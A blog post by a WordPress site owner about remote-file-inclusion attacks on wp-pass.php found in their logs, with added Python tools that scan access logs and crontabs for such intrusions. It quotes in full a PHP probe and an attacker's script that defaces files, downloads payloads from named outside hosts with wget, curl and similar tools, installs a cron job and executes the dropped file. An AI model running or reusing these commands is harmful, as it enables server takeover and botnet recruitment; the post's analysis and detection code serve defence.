Since the new year (New Year's Day, strangely enough) I've noticed a change in the way "the bad guys" try to interact with my site. Spam has slowed to a trickle, whereas attempts to exploit WordPress vulnerabilities seem to have increased tenfold.
Seriously, I don't use Akismet, just comment moderation, and if I didn't know better I'd think the blog spam epidemic was over! (We can all wish.)
But the exploits… it always seems to be the same type, all of which (so far) have been stopped by the fact that I update my WordPress install regularly. The common trick targets the wp-pass.php vulnerability, which was apparently fixed in WordPress 2.2.2. Basically, my logs show a 404 for a request like this:
https://mou.me.uk/wp-pass.php/?_wp_http_referer=http://frikyrkja.net/config/exp667.txt?
(We can assume http://frikyrkja.net is probably a compromised server somewhere)
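As an added example (not code from the original post), here is a small Python check that pulls exactly this pattern out of Apache combined-format access logs: any query parameter whose value is itself a remote URL, the remote-file-inclusion shape seen against wp-pass.php above. The log lines and the host name are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format: client, identd, user, timestamp, request line,
# status, bytes, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

REMOTE_SCHEMES = ("http://", "https://", "ftp://")

def find_rfi_attempts(lines):
    """One finding per request whose query string carries a remote URL.
    A 404 means the probed file is not there; a 200 deserves a closer look."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip it
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if value.lower().startswith(REMOTE_SCHEMES):
                findings.append({
                    "ip": m.group("ip"),
                    "status": int(m.group("status")),
                    "path": parts.path,
                    "param": name,
                    "remote_url": value,
                    "wp_pass": "wp-pass.php" in parts.path,
                })
    return findings

# Constructed sample lines (not real log data); the remote host is a placeholder.
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Jan/2008:10:14:22 +0000] "GET /wp-pass.php/?_wp_http_referer='
    'http://compromised-host.example/config/exp667.txt? HTTP/1.1" 404 312 "-" "Mozilla/5.0"',
    # a legitimate WordPress _wp_http_referer is a relative path and must not be flagged
    '198.51.100.9 - - [02/Jan/2008:10:15:01 +0000] "GET /wp-admin/edit.php?_wp_http_referer='
    '/wp-admin/ HTTP/1.1" 200 8123 "http://mou.me.uk/wp-admin/" "Mozilla/5.0"',
    '198.51.100.9 - - [02/Jan/2008:10:15:30 +0000] "GET /2008/01/hello/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_rfi_attempts(SAMPLE_LOG):
        print(finding)
```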
So, of course, I check out this site and take a look at what nasty code they're trying to execute. Nine times out of ten, it's looked relatively harmless:
$cmd="id"; $eseguicmd=ex($cmd); echo $eseguicmd; function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } elseif(function_exists('system')){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); }} return $res; }
This seems to be more of a fact-finder, testing whether your server is vulnerable and so on. But today I came across a particularly bad one:
//exploiter v0.01 for rfi reloader by axe $safemode=@ini_get('safe_mode'); if (@$_GET['filexp']) { if (@$_GET['deface_msg']) { $deface_msg = $_GET['deface_msg']; } else { $deface_msg = 'Patched Mother Fucker :p'; } $filexp = $_GET['filexp']; $fp = fopen("$filexp","w"); if ($fp) { fwrite($fp,$deface_msg); fclose($fp); } } $fp = file_exists('index.php'); if ($fp) { } else { passthru('touch index.php'); } if ($safemode) { ini_restore("safe_mode"); ini_restore("open_basedir"); shell_exec('killall -9 perl'); shell_exec('wget http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php'); shell_exec('curl -O http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php'); shell_exec('lwp-download http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php'); shell_exec('fetch http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php;rm -rf popup.txt*'); shell_exec("cd /tmp;echo '*/1 * * * * perl /tmp/.tmp/tmpfile' >cron.job;crontab cron.job;rm -rf cron.job"); shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;wget http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;curl -O http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;lwp-download http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;lynx -source http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;fetch http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); 
shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;GET http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); shell_exec('cd /dev/shm;wget http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); shell_exec('cd /dev/shm;curl -O http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); shell_exec('cd /dev/shm;lwp-download http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); shell_exec('cd /dev/shm;lynx -source http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); shell_exec('cd /dev/shm;fetch http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); shell_exec('cd /dev/shm;GET http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); } else { passthru('killall -9 perl'); passthru('wget http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php'); passthru('curl -O http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php'); passthru('lwp-download http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php'); passthru('fetch http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php;rm -rf popup.txt*'); passthru("cd /tmp;echo '*/1 * * * * perl /tmp/.tmp/tmpfile' >cron.job;crontab cron.job;rm -rf cron.job"); passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;wget http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); passthru('cd /tmp;mkdir .tmp;cd 
/tmp/.tmp;curl -O http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;lwp-download http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;lynx -source http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;fetch http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;GET http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); passthru('cd /dev/shm;wget http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); passthru('cd /dev/shm;curl -O http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); passthru('cd /dev/shm;lwp-download http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); passthru('cd /dev/shm;lynx -source http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); passthru('cd /dev/shm;fetch http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); passthru('cd /dev/shm;GET http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); }
I'll be the first to admit my Unix knowledge leaves a lot to be desired, but from what I can see this looks to be setting up a cron job to run a file one minute later, before creating a folder and using every method it can to try to download a text file to your server, which is then executed when the minute is up, and the cron job deletes itself. Clever. You can see an example of the text file by clicking here. (Note: I've added an exit; command at the top to stop the b*stards using this text file on other people!)
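As an added example (not part of the original post), here is a Python check for the persistence half of what the script above does: it parses a user crontab and flags jobs that run from world-writable scratch directories, from hidden paths, or every minute, which is exactly the shape of the `*/1 * * * * perl /tmp/.tmp/tmpfile` entry the script installs. The crontab text is constructed.

```python
import re

# World-writable directories a web-app compromise typically drops files into.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

def parse_crontab(text):
    """Yield (schedule, command) for each job line in a user crontab.
    Comments, blank lines and VAR=value assignments are skipped."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        fields = line.split(None, 5)  # five time fields, then the command
        if len(fields) < 6:
            continue
        yield " ".join(fields[:5]), fields[5]

def suspicious_cron_jobs(text):
    """Return the jobs that match one or more indicators, with the reasons."""
    findings = []
    for schedule, command in parse_crontab(text):
        reasons = []
        if any(d in command for d in SCRATCH_DIRS):
            reasons.append("runs from world-writable dir")
        if re.search(r"/\.[^/\s]+", command):  # e.g. /tmp/.tmp/...
            reasons.append("hidden path component")
        if schedule.startswith(("* ", "*/1 ")):  # minute field is * or */1
            reasons.append("runs every minute")
        if reasons:
            findings.append({"schedule": schedule, "command": command, "reasons": reasons})
    return findings

# Constructed sample crontab: one ordinary backup job and the entry the script installs.
SAMPLE_CRONTAB = """\
# constructed sample
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh
*/1 * * * * perl /tmp/.tmp/tmpfile
"""

if __name__ == "__main__":
    for job in suspicious_cron_jobs(SAMPLE_CRONTAB):
        print(job)
```

On a live box the same function can be fed the output of `crontab -l` for each user, plus the files under /etc/cron.d.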
Scary as hell. I haven't had a chance to sit down and puzzle out exactly what this script does if you execute it, but I'm willing to bet it's not pretty. There seems to be some code to connect to an IRC server, so the point of this is most likely to turn your server into a zombie bot. Or possibly to host exploit scripts for other unpatched WP users to download. I'll know more when I go through it properly (and hopefully learn a few new things about Unix!!)
The moral of the story? Keep your WordPress up to date! 😀 No, seriously, go do it now…